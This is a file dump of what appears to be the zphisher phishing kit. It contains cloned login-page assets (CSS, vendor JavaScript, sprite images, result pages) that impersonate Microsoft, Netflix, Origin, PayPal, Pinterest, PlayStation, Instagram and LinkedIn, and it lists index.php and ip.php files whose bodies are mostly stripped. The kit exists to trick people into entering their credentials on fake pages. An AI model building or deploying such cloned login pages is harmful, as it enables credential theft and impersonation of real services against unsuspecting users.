123 | 124 | 136 | 137 | 138 | -------------------------------------------------------------------------------- /websites/google_poll/result.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Poll completed successfully. Thank You! 5 | 6 | 7 | 8 | 9 | 10 |
11 | 12 |
13 |

VOTERANK

14 |

#289032

15 |
16 | 17 | 18 |

Poll completed successfully. Thank You!

19 | 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /websites/ig_followers/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/ig_followers/ip.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/ig_verify/ip.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/instagram/ip.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/linkedin/ip.php: -------------------------------------------------------------------------------- 1 | assets -------------------------------------------------------------------------------- /websites/microsoft/ellipsis_white.svg: -------------------------------------------------------------------------------- 1 | assets -------------------------------------------------------------------------------- /websites/microsoft/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/microsoft/ip.php: -------------------------------------------------------------------------------- 1 | assets -------------------------------------------------------------------------------- /websites/microsoft/prefetch.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Prefetch 5 | 6 | 7 | 8 | 14 | 15 | 16 | 20 | 21 | 22 | 23 | 24 | A -------------------------------------------------------------------------------- /websites/microsoft/sprite1.css: -------------------------------------------------------------------------------- 1 | .image-adchoices_icon-png{background:url('adchoices_icon.png');width:12px;height:12px}.image-olk_logo_white_cropped-png{background:url('olk_logo_white_cropped.png');width:265px;height:310px}.image-owa_brand-png{background:url('owa_brand.png');width:160px;height:30px}.image-readingpane_recipientwell_callout-png{background:url('readingpane_recipientwell_callout.png');width:370px;height:245px}.image-loading_blackbg-gif{background:url('loading_blackbg.gif');width:16px;height:16px}.image-loading_whitebg-gif{background:url('loading_whitebg.gif');width:16px;height:16px}.image-thinking16_blue-gif{background:url('thinking16_blue.gif');width:16px;height:16px}.image-thinking16_grey-gif{background:url('thinking16_grey.gif');width:16px;height:16px}.image-thinking16_white-gif{background:url('thinking16_white.gif');width:16px;height:16px}.image-thinking24-gif{background:url('thinking24.gif');width:24px;height:24px}.image-thinking32_blue-gif{background:url('thinking32_blue.gif');width:32px;height:32px}.image-thinking32_grey-gif{background:url('thinking32_grey.gif');width:32px;height:32px}.image-thinking32_white-gif{background:url('thinking32_white.gif');width:32px;height:32px}.image-r_jpg-png{width:75px;height:75px;background:url('sprite1.mouse.png') -0 -0}.image-clutter_delete_all-png{width:32px;height:32px;background:url('sprite1.mouse.png') -77px -0}.image-clutter_delete_all_p-png{width:32px;height:32px;background:url('sprite1.mouse.png') -111px -0}.image-listview_buscheck_single-png{width:16px;height:32px;background:url('sprite1.mouse.png') -145px -0}.image-listview_buscheck_top-png{width:16px;height:32px;background:url('sprite1.mouse.png') -163px -0}.image-listview_busstop_bottom-png{width:16px;height:32px;background:url('sprite1.mouse.png') -181px -0}.image-listview_busstop_empty-png{width:16px;height:32px;background:url('sprite1.mouse.png') -199px -0}.image-listview_busstop_middle-png{width:16px;height:32px;background:url('sprite1.mouse.png') -217px -0}.image-office_logo_white_small-png{width:81px;height:26px;background:url('sprite1.mouse.png') -235px -0}.image-dc-gdoc-png{width:20px;height:20px;background:url('sprite1.mouse.png') -318px -0}.image-dc-gsheet-png{width:20px;height:20px;background:url('sprite1.mouse.png') -340px -0}.image-dc-gslide-png{width:20px;height:20px;background:url('sprite1.mouse.png') -362px -0}.image-fberror4-png{width:18px;height:18px;background:url('sprite1.mouse.png') -384px -0}.image-googerror2-png{width:18px;height:18px;background:url('sprite1.mouse.png') -404px -0}.image-lierror2-png{width:18px;height:18px;background:url('sprite1.mouse.png') -424px -0}.image-sinweerror2-png{width:18px;height:18px;background:url('sprite1.mouse.png') -444px -0}.image-twitrerror2-png{width:18px;height:18px;background:url('sprite1.mouse.png') -464px -0}.image-yhooerror2-png{width:18px;height:18px;background:url('sprite1.mouse.png') -484px -0}.image-abchactive1-png{width:16px;height:16px;background:url('sprite1.mouse.png') -504px -0}.image-chevrons_down-png{width:16px;height:16px;background:url('sprite1.mouse.png') -522px -0}.image-close_p-png{width:16px;height:16px;background:url('sprite1.mouse.png') -540px -0}.image-dc-accdb-png{width:16px;height:16px;background:url('sprite1.mouse.png') -558px -0}.image-dc-aspx-png{width:16px;height:16px;background:url('sprite1.mouse.png') -576px -0}.image-dc-bmp-png{width:16px;height:16px;background:url('sprite1.mouse.png') -318px -22px}.image-dc-docx-png{width:16px;height:16px;background:url('sprite1.mouse.png') -336px -22px}.image-dc-exe-png{width:16px;height:16px;background:url('sprite1.mouse.png') -354px -22px}.image-dc-generic-png{width:16px;height:16px;background:url('sprite1.mouse.png') -372px -22px}.image-dc-gif-png{width:16px;height:16px;background:url('sprite1.mouse.png') -390px -22px}.image-dc-jpg-png{width:16px;height:16px;background:url('sprite1.mouse.png') -408px -22px}.image-dc-lync-png{width:16px;height:16px;background:url('sprite1.mouse.png') -426px -22px}.image-dc-mpg-png{width:16px;height:16px;background:url('sprite1.mouse.png') -444px -22px}.image-dc-msg-png{width:16px;height:16px;background:url('sprite1.mouse.png') -462px -22px}.image-dc-msg_attachment-png{width:16px;height:16px;background:url('sprite1.mouse.png') -480px -22px}.image-dc-one-png{width:16px;height:16px;background:url('sprite1.mouse.png') -498px -22px}.image-dc-pblsh-png{width:16px;height:16px;background:url('sprite1.mouse.png') -516px -22px}.image-dc-pdf-png{width:16px;height:16px;background:url('sprite1.mouse.png') -534px -22px}.image-dc-png-png{width:16px;height:16px;background:url('sprite1.mouse.png') -552px -22px}.image-dc-pptx-png{width:16px;height:16px;background:url('sprite1.mouse.png') -570px -22px}.image-dc-rpmsg-png{width:16px;height:16px;background:url('sprite1.mouse.png') -318px -40px}.image-dc-txt-png{width:16px;height:16px;background:url('sprite1.mouse.png') -336px -40px}.image-dc-vsd-png{width:16px;height:16px;background:url('sprite1.mouse.png') -354px -40px}.image-dc-wv-png{width:16px;height:16px;background:url('sprite1.mouse.png') -372px -40px}.image-dc-xlsx-png{width:16px;height:16px;background:url('sprite1.mouse.png') -390px -40px}.image-dc-zip-png{width:16px;height:16px;background:url('sprite1.mouse.png') -408px -40px}.image-event_accepted-png{width:16px;height:16px;background:url('sprite1.mouse.png') -426px -40px}.image-event_declined-png{width:16px;height:16px;background:url('sprite1.mouse.png') -444px -40px}.image-event_tentative-png{width:16px;height:16px;background:url('sprite1.mouse.png') -462px -40px}.image-fbactive4-png{width:16px;height:16px;background:url('sprite1.mouse.png') -480px -40px}.image-googactive2-png{width:16px;height:16px;background:url('sprite1.mouse.png') -498px -40px}.image-liactive-png{width:16px;height:16px;background:url('sprite1.mouse.png') -516px -40px}.image-mark_not_clutter-png{width:16px;height:16px;background:url('sprite1.mouse.png') -534px -40px}.image-mark_not_clutter_h-png{width:16px;height:16px;background:url('sprite1.mouse.png') -552px -40px}.image-response_approve-png{width:16px;height:16px;background:url('sprite1.mouse.png') -570px -40px}.image-response_reject-png{width:16px;height:16px;background:url('sprite1.mouse.png') -318px -58px}.image-response_request-png{width:16px;height:16px;background:url('sprite1.mouse.png') -336px -58px}.image-sinweactive-png{width:16px;height:16px;background:url('sprite1.mouse.png') -354px -58px}.image-skypeactive2-png{width:16px;height:16px;background:url('sprite1.mouse.png') -372px -58px}.image-task_red-png{width:16px;height:16px;background:url('sprite1.mouse.png') -390px -58px}.image-task_red_h-png{width:16px;height:16px;background:url('sprite1.mouse.png') -408px -58px}.image-twitractive2-png{width:16px;height:16px;background:url('sprite1.mouse.png') -426px -58px}.image-voicemail_irm-png{width:16px;height:16px;background:url('sprite1.mouse.png') -444px -58px}.image-yhooactive2-png{width:16px;height:16px;background:url('sprite1.mouse.png') -462px -58px}.image-task_reoccurring-png{width:15px;height:16px;background:url('sprite1.mouse.png') -480px -58px}.image-task-png{width:14px;height:16px;background:url('sprite1.mouse.png') -497px -58px}.image-triangle_down_small-png{width:12px;height:12px;background:url('sprite1.mouse.png') -513px -58px}.image-navigation_close-png{width:11px;height:11px;background:url('sprite1.mouse.png') -527px -58px}.image-clear1x1-gif{width:1px;height:1px;background:url('sprite1.mouse.png') -540px -58px}.csimg{padding:0;border:none;background-repeat:no-repeat;-webkit-touch-callout:none}span.csimg{-ms-high-contrast-adjust:none} -------------------------------------------------------------------------------- /websites/microsoft/sprite1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/d9ba6dd172294ae8aefa6ea391f47b265c6ecff9/websites/microsoft/sprite1.png -------------------------------------------------------------------------------- /websites/netflix/FB-f-Logo__blue_57.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/d9ba6dd172294ae8aefa6ea391f47b265c6ecff9/websites/netflix/FB-f-Logo__blue_57.png -------------------------------------------------------------------------------- /websites/netflix/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/netflix/ip.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/origin/ip.php: -------------------------------------------------------------------------------- 1 | 0){a("#password").siblings(".otkicon-capslock").removeClass("otkinput-capslock-visible")}};a("#password").on("keypress",e);a("#password").on("focusout",d);a(".otkcheckbox input, .otkradio input, .otkselect select").focusin(function(g){g.preventDefault();a(this).parent("span").addClass("focus")}).focusout(function(g){g.preventDefault();a(this).parent("span").removeClass("focus")});var f=function(g){if(!g){return}g.each(function(){var n=2;var r=parseFloat(a(this).css("padding-top"))+n;var j=parseFloat(a(this).css("padding-right"))+n;var i=parseFloat(a(this).css("padding-bottom"))+n;var k=parseFloat(a(this).css("padding-left"))+n;var q=r+"px "+j+"px "+i+"px "+k+"px";a(this).css("padding",q);var h=parseFloat(a(this).css("margin-top"))-n;var p=parseFloat(a(this).css("margin-right"))-n;var m=parseFloat(a(this).css("margin-bottom"))-n;var l=parseFloat(a(this).css("margin-left"))-n;var o=h+"px "+p+"px "+m+"px "+l+"px";a(this).css("margin",o);a(this).css("outline-offset","-2px");a(this).hover(function(){a(this).blur()},function(){a(this).blur()});a(this).click(function(){a(this).blur()});a(this).focus(function(){a(this).addClass("outline-focus")});a(this).blur(function(){a(this).removeClass("outline-focus")})})};f(a("a.forgot-password-link"));f(a("a.registration-link"));f(a("div#panel-privacy-settings > p > a"));a(a("div#panel-privacy-settings > p > a")).css("outline-offset","0px");f(a("label#label-readAccept > a"));f(a("#uploader.container-inner > .file-select-note > span > a"));f(a("#panel-profile-upgrade > .panel-contents > .panel-content > p > a"));f(a("#panel-nux > .panel-contents > .panel-content > p > a"))};a(document).ready(function(){c()})})(jQuery);"use strict";var QWebChannelMessageTypes={signal:1,propertyUpdate:2,init:3,idle:4,debug:5,invokeMethod:6,connectToSignal:7,disconnectFromSignal:8,setProperty:9,response:10,};var QWebChannel=function(c,a){if(typeof c!=="object"||typeof c.send!=="function"){console.error("The QWebChannel expects a transport object with a send function and onmessage callback property. Given is: transport: "+typeof(c)+", transport.send: "+typeof(c.send));return}var b=this;this.transport=c;this.send=function(d){if(typeof(d)!=="string"){d=JSON.stringify(d)}b.transport.send(d)};this.transport.onmessage=function(d){var e=d.data;if(typeof e==="string"){e=JSON.parse(e)}switch(e.type){case QWebChannelMessageTypes.signal:b.handleSignal(e);break;case QWebChannelMessageTypes.response:b.handleResponse(e);break;case QWebChannelMessageTypes.propertyUpdate:b.handlePropertyUpdate(e);break;default:console.error("invalid message received:",d.data);break}};this.execCallbacks={};this.execId=0;this.exec=function(d,e){if(!e){b.send(d);return}if(b.execId===Number.MAX_VALUE){b.execId=Number.MIN_VALUE}if(d.hasOwnProperty("id")){console.error("Cannot exec message with property id: "+JSON.stringify(d));return}d.id=b.execId++;b.execCallbacks[d.id]=e;b.send(d)};this.objects={};this.handleSignal=function(e){var d=b.objects[e.object];if(d){d.signalEmitted(e.signal,e.args)}else{console.warn("Unhandled signal: "+e.object+"::"+e.signal)}};this.handleResponse=function(d){if(!d.hasOwnProperty("id")){console.error("Invalid response message received: ",JSON.stringify(d));return}b.execCallbacks[d.id](d.data);delete b.execCallbacks[d.id]};this.handlePropertyUpdate=function(f){for(var e in f.data){var g=f.data[e];var d=b.objects[g.object];if(d){d.propertyUpdate(g.signals,g.properties)}else{console.warn("Unhandled property update: "+g.object+"::"+g.signal)}}b.exec({type:QWebChannelMessageTypes.idle})};this.debug=function(d){b.send({type:QWebChannelMessageTypes.debug,data:d})};b.exec({type:QWebChannelMessageTypes.init},function(e){for(var f in e){var d=new QObject(f,e[f],b)}for(var f in b.objects){b.objects[f].unwrapProperties()}if(a){a(b)}b.exec({type:QWebChannelMessageTypes.idle})})};function QObject(d,g,e){this.__id__=d;e.objects[d]=this;this.__objectSignals__={};this.__propertyCache__={};var c=this;this.unwrapQObject=function(l){if(l instanceof Array){var m=new Array(l.length);for(var n=0;nlabel{vertical-align:middle;line-height:24px;white-space:normal}.otkcheckbox>input,.otkradio>input{display:block;opacity:0;position:absolute}.otkcheckbox.focus>label:before,.otkradio.focus>label:before,.otkselect.focus>.otkselect-label{border:1px solid #f56c2d}.otkbtn-primary.disabled{cursor:default;opacity:.45;pointer-events:none}select.disabled{pointer-events:none}.otknotice-stripe-message .otkicon{left:0}.otkform-group-field.otkicon{top:0;display:block}.otkicon-checkcircle,.otkicon-challenge{left:-18px;color:#04bd68;-webkit-animation:popIn .5s ease-in-out;-moz-animation:popIn .5s ease-in-out;-o-animation:popIn .5s ease-in-out;animation:popIn .5s ease-in-out}.otkicon-warning{left:-18px;color:#fea722;-webkit-animation:popIn .5s ease-in-out;-moz-animation:popIn .5s ease-in-out;-o-animation:popIn .5s ease-in-out;animation:popIn .5s ease-in-out}.otkicon-warning:before,.otkicon-checkcircle:before,.otkicon-challenge:before{display:block;font-size:96px}.right{float:right}.otkbtn:hover{background:#c85e36}footer{height:40px;margin:0;padding:0;top:0;border-radius:0 0 4px 4px;color:#787d85;background-color:#edf1f2;display:block;clear:both;position:relative;overflow:hidden}footer img{height:20px;margin:10px 12px 10px 24px}img{vertical-align:middle}.upgrade-privacy-friend{margin-bottom:12px;display:inline-block}.otkinput-capslock{display:none;position:absolute;top:50%;left:330px;-webkit-transform:translate(0,-50%);-ms-transform:translate(0,-50%);transform:translate(0,-50%);z-index:2;color:#c3c6ce;font-size:32px}.otkicon-capslock-position{left:295px}.otkinput-capslock-visible{display:block}*,*:before,*:after{-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box}*{padding:0;margin:0;-webkit-backface-visibility:hidden} -------------------------------------------------------------------------------- /websites/origin/originX-pc-login.css: -------------------------------------------------------------------------------- 1 | .otktooltip-bottom .otktooltip-arrow{top:2px}.otktooltip{margin:0;padding:0}.otktooltip-effect .otktooltip-bottom{position:relative;top:-5px;left:-44%;height:0}.otktooltip .otktooltip-inner{position:relative;top:7px;padding:10px 12px;text-align:left}#logViews section p{margin-bottom:24px}#loginBase .otkbtn{margin-top:6px;width:100%;max-width:100%}#loginBase .otkbtn-primary{margin-top:0}#passwordShow{position:absolute;top:0;right:14px;padding:6px;width:inherit!important;z-index:1}#passwordShow.otkbtn-light{color:#141b20;border:1px solid #c3c6ce;background:#edf1f2}#passwordShow.otkbtn-light:hover{background:#c3c6ce}.otktooltip-withcontent{display:inline-table;position:relative}#logViews .otkicon-help{font-size:24px;color:#c3c6ce;position:static;height:16px;display:-webkit-inline-box;top:0}.clearfix:after,.tile-touch .otkscrim:after{content:"";display:table;clear:both}.captcha-container{list-style:outside none none}.recaptcha-form-default{padding:24px;border-radius:4px;background-color:#edf1f2;text-align:center;margin-bottom:24px}.recaptcha-form-default a{outline:0;text-decoration:none;position:relative;width:0;font-size:18px;color:#787d85;cursor:pointer;-webkit-transition:color .3s ease-in-out;-moz-transition:color .3s ease-in-out;-ms-transition:color .3s ease-in-out;-o-transition:color .3s ease-in-out;transition:color .3s ease-in-out}.otkfield-input{height:45px;padding:0 10px}.otkfield{position:relative;display:block;width:100%;margin:0;font-size:16px;font-weight:400;font-family:inherit;background:#fff;outline:0;border:1px solid #c3c6ce;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;border-radius:4px;-moz-appearance:none;-webkit-appearance:none;appearance:none;-webkit-transition:all .3s ease-in-out;transition:all .3s ease-in-out}.otkicon-refresh{margin:5px}.recaptcha-form-default input{width:200px;margin:auto}.recaptcha-form-default img{margin-top:18px;margin-bottom:18px;border-radius:4px;margin-left:30px}.recaptcha-form-default input:focus{border:1px solid #f56c2d!important;background:#fff;z-index:1;-webkit-box-shadow:0 0 1px 0 #f56c2d;box-shadow:0 0 1px 0 #f56c2d}#captcha-container2{margin-bottom:25px}#prepopulate-email .otkicon-profile{font-size:24px;color:#1e262c}#prepopulate-email{padding:10px}#prepopulate-email .otkicon-profile:before{content:"\e606"}#login-with-phone-number{display:inline-block;margin-top:6px;cursor:pointer}#logout-and-relogin{display:inline-block;margin-top:6px;cursor:pointer}.otkicon-warning{font-size:96px;left:-18px;color:#fea722}.otknotice-stripe{background-color:#22313c;color:#fff;position:fixed;z-index:0;top:0;height:0;width:100%;transition:all .6s cubic-bezier(0.03,1,0.2,1);text-align:center;overflow:hidden}.otknotice-error,.otknotice-passive,.otknotice-warning{background-color:#22313c;color:#fff}.otknotice-error+.views section,.otknotice-passive+.views section,.otknotice-warning+.views section{height:calc(708px - 150px)}.otknotice-stripe.otknotice-active{z-index:1000;padding:8px 0 16px 0;height:initial;transition:all .6s cubic-bezier(0.03,1,0.2,1)}.otknotice-stripe{position:static}.otknotice-stripe-message .otkicon{left:0}.otknotice-error .otkicon{color:#ff6550;font-size:24px;top:6px;padding-right:0}.otknotice-passive .otkicon{color:#2ac4f5;font-size:24px;top:6px;padding-right:0}.otknotice-warning .otkicon{color:#fea722;font-size:24px;top:6px;padding-right:0}.otkicon-warning:before{font-size:24px}.otkcheckbox>label,.otkradio>label{display:inline}.checkbox-login-first{display:block;margin-bottom:20px}.checkbox-login-last{display:block;margin-bottom:20px}.otktooltip-withcontent{display:inline-table;position:relative}.otkicon-help{font-size:24px;color:#c3c6ce;position:static;height:17px;display:-webkit-inline-box;top:0}#check-phone-number-form{margin-bottom:25px}.phone-number-container .ptklabel{display:block;margin-bottom:10px}.phone-number-container .otktooltip-inner{padding:15px}.phone-number-container .otktooltip-arrow{bottom:-5px!important}.phone-number-input{display:flex}.phone-number-select{position:relative;width:30%}.phone-number-select select{border-bottom-right-radius:0}.phone-number-write{width:70%}.phone-number-write input{border-top-left-radius:0!important;border-bottom-left-radius:0!important}.phone-number-pad{padding-left:38px;border-top-right-radius:0;border-bottom-right-radius:0;border-bottom-left-radius:4px;border-top-left-radius:4px}.phone-number-pad,.phone-number-placeholder{padding-left:38px;border-top-right-radius:0;border-bottom-right-radius:0;border-bottom-left-radius:4px;border-top-left-radius:4px}.phone-number-placeholder{color:#787d85} -------------------------------------------------------------------------------- /websites/origin/utag.js: -------------------------------------------------------------------------------- 1 | //tealium universal tag - utag.344 ut4.0.201610241851, Copyright 2016 Tealium.com Inc. All Rights Reserved. 2 | try{(function(id,loader){var u={};utag.o[loader].sender[id]=u;if(utag.ut===undefined){utag.ut={};} 3 | if(utag.ut.loader===undefined){u.loader=function(o){var b,c,l,a=document;if(o.type==="iframe"){b=a.createElement("iframe");o.attrs=o.attrs||{"height":"1","width":"1","style":"display:none"};for(l in utag.loader.GV(o.attrs)){b.setAttribute(l,o.attrs[l]);}b.setAttribute("src",o.src);}else if(o.type=="img"){utag.DB("Attach img: "+o.src);b=new Image();b.src=o.src;return;}else{b=a.createElement("script");b.language="javascript";b.type="text/javascript";b.async=1;b.charset="utf-8";for(l in utag.loader.GV(o.attrs)){b[l]=o.attrs[l];}b.src=o.src;}if(o.id){b.id=o.id};if(typeof o.cb=="function"){if(b.addEventListener){b.addEventListener("load",function(){o.cb()},false);}else{b.onreadystatechange=function(){if(this.readyState=='complete'||this.readyState=='loaded'){this.onreadystatechange=null;o.cb()}};}}l=o.loc||"head";c=a.getElementsByTagName(l)[0];if(c){utag.DB("Attach to "+l+": "+o.src);if(l=="script"){c.parentNode.insertBefore(b,c);}else{c.appendChild(b)}}}}else{u.loader=utag.ut.loader;} 4 | if(utag.ut.typeOf===undefined){u.typeOf=function(e){return({}).toString.call(e).match(/\s([a-zA-Z]+)/)[1].toLowerCase();};}else{u.typeOf=utag.ut.typeOf;} 5 | if(utag.ut.merge===undefined){u.merge=function(a,b,c,d){if(c){for(d in utag.loader.GV(b)){a[d]=b[d];}}else{for(d in utag.loader.GV(b)){if(typeof a[d]=="undefined"){a[d]=b[d];}}}};}else{u.merge=utag.ut.merge;} 6 | u.ev={"view":1,"link":1};u.initialized=false;u.scriptrequested=false;u.queue=[];u.event_lookup={"ViewContent":{obj:"vc","map":["value","currency","content_name","content_ids","content_category"]},"Search":{obj:"search","map":["value","currency","content_category","content_ids"]},"AddToCart":{obj:"cart","map":["value","currency","content_name","content_ids"]},"AddToWishlist":{obj:"wish","map":["value","currency","content_name","content_ids"]},"InitiateCheckout":{obj:"cout","map":["value","currency","content_name","content_ids","num_items"]},"AddPaymentInfo":{obj:"payment","map":["value","currency","content_category","content_ids"]},"Purchase":{obj:"purch","map":["value","currency","content_name","content_ids","num_items"]},"Lead":{obj:"lead","map":["value","currency","content_name","content_category"]},"CompleteRegistration":{obj:"reg","map":["value","currency","content_name"]},"Conversion":{obj:"cnv","map":["value","currency"]},"Custom":{obj:"cust","map":[]},"PageView":{obj:"page","map":[]}};u.std_params={"value":function(g,event){if(g.value===undefined||g.value===""){if(event==="ViewContent"||event==="AddToCart"){g.value=u.data.ecom.product_unit_price;}else{g.value=u.data.ecom.order_subtotal;}} 7 | g.value=u.val(g.value);},"currency":function(g){if(!g.currency){g.currency=u.data.ecom.order_currency;}},"content_name":function(g){if(!g.content_name){g.content_name=u.data.ecom.product_name;} 8 | g.content_name=u.val(g.content_name);},"content_ids":function(g){if(!g.content_ids){g.content_ids=u.data.ecom.product_id;} 9 | if(u.typeOf(g.content_ids)!=="array"){g.content_ids=g.content_ids.split(/\s*,\s*/);}},"content_category":function(g){if(!g.content_category){g.content_category=u.data.ecom.product_category;} 10 | g.content_category=u.val(g.content_category);},"num_items":function(g){if(!g.num_items&&u.data.calc_items==="true"){g.num_items=u.calc_items(u.data.ecom.product_quantity);}}};u.map_func=function(arr,obj,item){var i=arr.shift();obj[i]=obj[i]||{};if(arr.length>0){u.map_func(arr,obj[i],item);}else{obj[i]=item;}};u.val=function(value){return u.typeOf(value)==="array"?value[0]:value;};u.remove_empty=function(a){var b,t;for(b in utag.loader.GV(a)){t=u.typeOf(a[b]);if(t==="object"){u.remove_empty(a[b]);if(u.isEmptyObject(a[b])){try{delete a[b];}catch(e){a[b]=undefined;}}}else if(!((a[b]===0||a[b]===false)?!0:(t==="array"&&a[b].length===0)?!1:!!a[b])){try{delete a[b];}catch(e){a[b]=undefined;}}} 11 | return a;};u.calc_items=function(quan){var q,i=0;for(q=0;q 6 | -------------------------------------------------------------------------------- /websites/paypal/ip.php: -------------------------------------------------------------------------------- 1 | b;b+=4)c[b/4]=a[b]<<24|a[b+1]<<16|a[b+2]<<8|a[b+3];for(b=16;80>b;b++)a=c[b-3]^c[b-8]^c[b-14]^c[b-16],c[b]=(a<<1|a>>>31)&4294967295;a=e[0];var d=e[1],f=e[2],l=e[3],g=e[4];for(b=0;80>b;b++){if(40>b)if(20>b){var k=l^d&(f^l);var n=1518500249}else k=d^f^l,n=1859775393;else 60>b?(k=d&f|l&(d|f),n=2400959708):(k=d^f^l,n=3395469782);k=((a<<5|a>>>27)&4294967295)+ 4 | k+g+n+c[b]&4294967295;g=l;l=f;f=(d<<30|d>>>2)&4294967295;d=a;a=k}e[0]=e[0]+a&4294967295;e[1]=e[1]+d&4294967295;e[2]=e[2]+f&4294967295;e[3]=e[3]+l&4294967295;e[4]=e[4]+g&4294967295}function b(a,b){if("string"===typeof a){a=unescape(encodeURIComponent(a));for(var e=[],d=0,l=a.length;dg?b(n,56-g):b(n,64-(g-56));for(var p=63;56<=p;p--)f[p]=d&255,d>>>=8;c(f);for(p=d=0;5>p;p++)for(var m=24;0<=m;m-=8)a[d++]=e[p]>>m&255;return a}for(var e=[],f=[],m=[],n=[128],B=1;64>B;++B)n[B]=0;var g,k;a();return{reset:a,update:b,digest:d,digestString:function(){for(var a=d(),b="",c=0;ca.length)return null;c=a[0];b=gadgets.rpc.getOrigin(a[1]);if(b!==a[1])return null;a=a.slice(2);return(a=(b&&c?["session_state",aa(G(b),c,a||[])].join(" "):null)||"")&&a.substr(14)||null},K=function(a,c,b){this.i=String(a||"");this.f=String(c||"");this.a=String(b||"");this.b={};this.j=this.l=this.g=this.h="";this.c=null}; 6 | K.prototype.evaluate=function(){var a={},c="";try{c=String(document.cookie||"")}catch(m){}c=c.split("; ").join(";").split(";");for(var b=0,d=c.length;bMask -------------------------------------------------------------------------------- /websites/pinterest/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/pinterest/ip.php: -------------------------------------------------------------------------------- 1 | 1&&void 0!==arguments[1]?arguments[1]:f.a,o="fb";u.a.load([],"//connect.facebook.net/en_US/sdk.js","fb"),u.a.ready("fb",function(){var n=window.FB;n&&(s||(n.init({appId:r.a.FB_KEY,status:!0,version:"v2.2"}),FB.Event.subscribe("auth.statusChange",function(n){d.refreshAccessToken(t)}),s=!0),e(n))})},ensureLoggedIn:function n(e,t){d.ensureInit(function(n){d.logIn(n,e)},t)},logIn:function n(e,t){e&&(e.getUserID()?t(e):e.login(function(){t(e)}))},refreshAccessToken:function n(e){e.isAuthenticated()&&e.attributes.facebook_id&&!e.isLimitedLogin()&&d.ensureInit(function(n){if(n.getUserID()){var e=n.getAccessToken();e&&c.a.create("UserSocialNetworkResource",{facebook_token:e}).callUpdate({showError:!1})}},e)},injectTrackingPixel:function n(e){!function(){var n=window._fbq||(window._fbq=[]);if(!n.loaded){var e=document.createElement("script");e.async=!0,e.src="//connect.facebook.net/en_US/fbds.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t),n.loaded=!0}}(),window._fbq=window._fbq||[],window._fbq.push(["track",e,{value:"0.00",currency:"USD"}])}};e.default=o.a.expose("Facebook",d)}}); -------------------------------------------------------------------------------- /websites/pinterest/pjs-51-02ea5c5c9fb36b662bcf.js: -------------------------------------------------------------------------------- 1 | webpackJsonp([51],{Bq5V:function(n,o,e){"use strict";Object.defineProperty(o,"__esModule",{value:!0});var t=e("1RBt"),a=e.n(t),d={};d.ready=function(n,o){a.a.ready(n,o)},d.load=function(n,o,e){d.ready(n,function(){0===o.lastIndexOf("//",0)&&(o=window.location.protocol+o),a()(o,e)})},d.done=function(n){a.a.done(n)},o.default=d}}); -------------------------------------------------------------------------------- /websites/pinterest/postmessageRelay.html: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /websites/pinterest/sdk_002.js: -------------------------------------------------------------------------------- 1 | /*1530213726,,JIT Construction: v4056814,en_US*/ 2 | 3 | /** 4 | * Copyright (c) 2017-present, Facebook, Inc. All rights reserved. 5 | * 6 | * You are hereby granted a non-exclusive, worldwide, royalty-free license to use, 7 | * copy, modify, and distribute this software in source code or binary form for use 8 | * in connection with the web services and APIs provided by Facebook. 9 | * 10 | * As with any software that integrates with the Facebook platform, your use of 11 | * this software is subject to the Facebook Platform Policy 12 | * [http://developers.facebook.com/policy/]. This copyright notice shall be 13 | * included in all copies or substantial portions of the software. 14 | * 15 | * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS 17 | * FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR 18 | * COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER 19 | * IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN 20 | * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 21 | */ 22 | (function _(a,b){var c=24*60*60,d=7*c,e="https://developers.facebook.com/docs/accountkit/integratingweb#configureloginhtml";e="Please ensure the AccountKit SDK is hotlinked directly. See "+e;b=Math.floor(new Date().getTime()/1e3)-b;if(b>d)throw new Error("The SDK is more than 7 days old. "+e);else if(b>c){d=window.console;d&&d.warn("The SDK is more than 1 day old. "+e)}window.AccountKit||(window.AccountKit={doNotLinkToSDKDirectly:"doNotLinkToSDKDirectly"});b=document.createElement("script");b.src=a;b.async=!0;c=document.getElementsByTagName("script")[0];c.parentNode&&c.parentNode.insertBefore(b,c)})("https:\/\/sdk.accountkit.com\/en_US\/sdk.js?hash=8b73d238a64cb37d9651dcda4d596877", 1530213726); -------------------------------------------------------------------------------- /websites/playstation/api.js.download: -------------------------------------------------------------------------------- 1 | /* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};(cfg['enterprise']=cfg['enterprise']||[]).push(false);(cfg['render']=cfg['render']||[]).push('explicit');(cfg['onload']=cfg['onload']||[]).push('widgetLoaded');w['__google_recaptcha_client']=true;var 